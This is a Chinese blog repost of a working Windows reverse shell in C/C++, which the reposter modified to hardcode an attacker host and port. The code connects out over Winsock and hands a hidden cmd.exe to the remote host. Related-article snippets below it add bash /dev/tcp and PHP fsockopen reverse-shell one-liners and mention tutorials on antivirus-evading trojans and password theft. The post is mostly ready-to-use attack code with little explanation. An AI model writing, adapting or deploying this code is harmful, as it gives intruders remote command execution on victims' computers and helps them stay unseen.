C/C++编写的反向SHELL

最新推荐文章于 2023-12-06 17:35:56 发布
最新推荐文章于 2023-12-06 17:35:56 发布
阅读量1.9k 收藏 3
点赞数

转载来源:
https://www.nulled.to/topic/87972-custom-windows-reverse-shell-backdoor-written-in-c/
http://sh3llc0d3r.com/windows-reverse-shell-shellcode-i/
下面是我根据原文的修改,将命令行指定ip端口改为写死。将原文多字节编码改为Unicode编码。

#include <winsock2.h>
#include <stdio.h>
#pragma comment(lib,"ws2_32")

WSADATA wsaData;
SOCKET Winsock; // 本地socket
struct sockaddr_in hax; // 黑客的地址结构
char ip_addr[16] = "192.168.3.237"; // 黑客的ip地址(或者主机名)
char port[6] = "7500";              // 黑客的端口

// 指定新进程主窗口的特性
STARTUPINFO ini_processo;

// 返回有关新进程及其主线程的信息
PROCESS_INFORMATION processo_info;

int main()
{
    WSAStartup(MAKEWORD(2, 2), &wsaData);
    Winsock = WSASocket(AF_INET, SOCK_STREAM, IPPROTO_TCP, NULL, (unsigned int)NULL, (unsigned int)NULL);


    struct hostent *host; // 黑客主机信息
    host = gethostbyname(ip_addr);
    strcpy_s(ip_addr, inet_ntoa(*((struct in_addr *)host->h_addr)));

    hax.sin_family = AF_INET;
    hax.sin_port = htons(atoi(port));
    hax.sin_addr.s_addr = inet_addr(ip_addr);

    // 连接黑客主机
    WSAConnect(Winsock, (SOCKADDR*)&hax, sizeof(hax), NULL, NULL, NULL, NULL);

    memset(&ini_processo, 0, sizeof(ini_processo));
    ini_processo.cb = sizeof(ini_processo);
    ini_processo.dwFlags = STARTF_USESTDHANDLES | STARTF_USESHOWWINDOW; // 重定向,隐藏窗口
    // 将标准输入、输出、错误重定向到socket句柄
    ini_processo.hStdInput = ini_processo.hStdOutput = ini_processo.hStdError = (HANDLE)Winsock;

    TCHAR cmd[255] = TEXT("cmd.exe");

    CreateProcess(NULL, cmd, NULL, NULL, TRUE, 0, NULL, NULL, &ini_processo, &processo_info);

    return 0;
}
hambaga
关注
  • 0
    点赞
  • 3
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
C语言/C++ 烟花表白代码
10-13
C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码 C语言/C++ 烟花表白代码
C语言/C++环境压缩包
最新发布
01-10
C语言/C++环境压缩包
c语言编写反弹shell源码,渗透不会反弹shell?来教你写一个cmd的shell
weixin_39942474的博客
05-22 707
原创 lengyi 合天智汇包含的库:#include #include #include #include #include #pragma comment(lib, "Ws2_32.lib")#define DEFAULT_BUFLEN 1024winsock2和ws2tcpip两个库文件是用来初始化网络套接字的。windows用来初始化一些windows下的函数,string方便我们后面的...
C/C++ 匿名管道反弹CMDShell
CSDN
06-11 5521
该段代码是一个用于Windows平台的反向Shell程序,它通过在被控制端和控制端之间建立网络连接,实现远程控制和命令执行。它在被控制端创建管道来重定向控制台命令输出,并将命令执行结果发送回控制端。控制端可以向被控制端发送命令,被控制端接收并执行这些命令,并将执行结果返回给控制端。一旦连接成功,程序可以接收本地输入的命令,并在远程主机上执行这些命令,并将命令的输出返回到本地主机。然后,程序通过管道将命令输出发送回本地,并持续监听新的命令输入。
用c++写一个远程控制木马(转)
2301_78273259的博客
07-06 1625
1)UINT GetSystemDirectory()函数这个函数的参数 lpBuffer会返回系统路径,我们提取前面两位就是就可以得到系统分区,例如“C:”2)DWORD GetModuleFileName()函数这个函数是返回我们程序自身的完整路径。
C语言/C++基础之爱心程序源码
12-20
C语言/C++基础之爱心程序源码,适合初学C语言/C++的小伙伴学习研究,博客中有对应的讲解和演示,避免走弯路,费时费力。也真心希望能够帮助正在苦学C语言/C++ 程序设计的小伙伴们,你们的成长是我最大的幸福
学习记录:内网穿透+ShellCode+C++语言二次编译 免杀绕过火绒 渗透Win10提取密码
qq_60709081的博客
06-24 1391
攻击机:Kali (虚拟机)靶机: Windows 10 22H2 版本 10.0.19045(物理机)工具:MSF,VS,花生壳通过C++二次编译制作免杀木马,绕过火绒检测,实现对靶机的控制,windows本地提权,获取并破解用户密码。今天又进步了一点点,之后打算去打基础了,一步一步来。但毕竟做任何事都要有些动力的,做一个ScriptsKids反倒可以增加自己的兴趣和动力呢。🎉✨免责声明:本文仅作学习、深研而用,若有犯罪行为,一切后果自负,与本文作者无关。
入侵检测——如何实现反弹shell检测?
qq_42009262的博客
03-24 2370
如何实现反弹shell检测?
CVE初探之CVE-2019-6250反弹Shell
蚁景网安学院
12-06 473
概述ZMQ(Zero Message Queue)是一种基于消息队列得多线程网络库,C++编写,可以使得Socket编程更加简单高效。该编号为CVE-2019-6250的远程执行漏洞,主要出现在ZMQ的核心引擎libzmq(4.2.x以及4.3.1之后的4.3.x)定义的ZMTP v2.0协议中。这一漏洞已经有很多师傅都已经分析并复现过了,但在环境搭建和最后的利用都所少有一些不完整,为了更好的学习...
Windows下管道型后门及反向shell编写与总结(C++)
輚至消亡
09-20 711
1. 双管道被动连接型后门 #define _CRT_SECURE_NO_WARNINGS #define _WINSOCK_DEPRECATED_NO_WARNINGS #include <WinSock2.h> #include <iostream> #include <windows.h> #include <cstdlib> #include <iostream> #include <urlmon.h> #include &
Linux 上反弹shell各种语言实现
SHELLCODE_8BIT的博客
04-22 2105
C编写实现Linux反弹shell [ Mi1k7ea ] https://github.com/pH-T/go-revshell https://github.com/vay3t/go-nc
win32_reverse_shell:用c ++编写反向shell,支持DNS名称解析,因此您可以将其与NGROK或任何您使用的东西一起使用
02-12
win32_reverse_shell 用C ++编写反向Shell支持DNS名称解析,因此您可以将其与NGROK或任何您使用的东西一起使用 显然,includes.h是我通常用于每个项目的常规包含文件。 如果您需要减轻二进制文件的大小,请随意删除以下标头: #include <iostream> #include <time> #include <queue> #include <assert> #include <fstream> #include <algorithm> #include <sstream> using std::string; using std::queue; using std::vector; using std::ostringstream; 当前,这可能会被任何优秀的防病毒软件捕获,但是将来我计划将其实施到win32 shellcode中,然
二维码(QRcode)生成算法 C语言/C++源码
02-11
#二维码(QRcode)生成算法 C语言/C++ 源码 1. 根据输入字符串识别编码模式; 2. 根据输入字符串长度选择合适的QRcode版本; 3. 将编码转换为二进制位流表示为数据码字; 4. 使用多项式生成纠错码; 5. 将数据码和纠错码排列到二维码上; 6. 加入定位符号、时序符号等; 7. 加入格式信息; 8. 在命令行输出二维码样式。
C语言/C++基础之爱心源码
12-20
C语言/C++基础之爱心源码,适合初学C语言/C++的小伙伴学习研究,博客中有对应的讲解和演示,避免走弯路,费时费力。也真心希望能够帮助正在苦学C语言/C++ 程序设计的小伙伴们,你们的成长是我最大的幸福
用C语言写的shell源码
11-02
用C语言写的shell源码,有兴趣的同学可以一起开发,基本功能已经实现,shell脚本还在开发中 有兴趣的同学可以,提提宝贵意见
常见的反弹shell的方法以及对反弹shell的解释
热门推荐
qq_45584159的博客
03-04 1万+
文章目录一.什么是反弹shell,以及对反弹shell作用原理的解析:3.反弹shell的本质linux文件描述符重定向输入重定向输出重定向标准输出与标准错误输出重定向文件描述符的复制exec 绑定重定向对反弹shell执行的实例分析:>&、&>常见linux提权 一.什么是反弹shell,以及对反弹shell作用原理的解析: 1.定义 通俗来说,shell就是实现用户命令的接口,通过该接口我们能实现对计算机的控制(root权限), 而反弹shell就是将shell反弹给攻击者
反弹shell原理与实现
兴乐安宁的博客
04-20 1997
反弹shell(Reverse Shell)是一种常用于网络攻击中的技术,其目的是让攻击者通过远程控制程序获取被攻击计算机的权限。反弹shell技术通常是通过在受害者计算机上运行一个程序(称为“后门”),将计算机的控制权传递给攻击者。攻击者可以使用该程序在远程计算机上执行命令并访问其文件系统、网络接口等资源。在反弹shell攻击中,攻击者通常首先在受害者计算机上安装一个后门程序,然后使用一个包含恶意代码的文件或链接来欺骗用户打开该文件或链接。
反弹shell语句
u012482741的博客
03-24 566
bash -i >& /dev/tcp/10.0.10.124/23008 0>&1 php -r '$sock=fsockopen("150.158.104.227",4444);exec("/bin/sh -i <&3 >&3 2>&3");' python -c 'import socket,subprocess,os...
修改:类shell程序的简化实现,尝试消除ctrl+c,结果处理完信号后挑出了while循环
YOU CAN IF YOU BELIEVE YOU CAN
09-04 532
一、源代码 R*_*G:vim 1_8.c   1 #include "apue.h"   2 #include   3   4 static void sig_int(int);   5   6 int main(void)   7 {   8         pid_t pid;   9         char buf[MAXLINE];  10         in
基于C/C++的shell命令解释器
06-09
好的,我可以为您提供一些基于C/C++的shell命令解释器的设计思路和建议。 1. 命令解释器设计 在设计命令解释器时,您需要考虑如何解析用户输入的命令,并执行相应的操作。这可能涉及到一些字符串处理和解析技术,...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值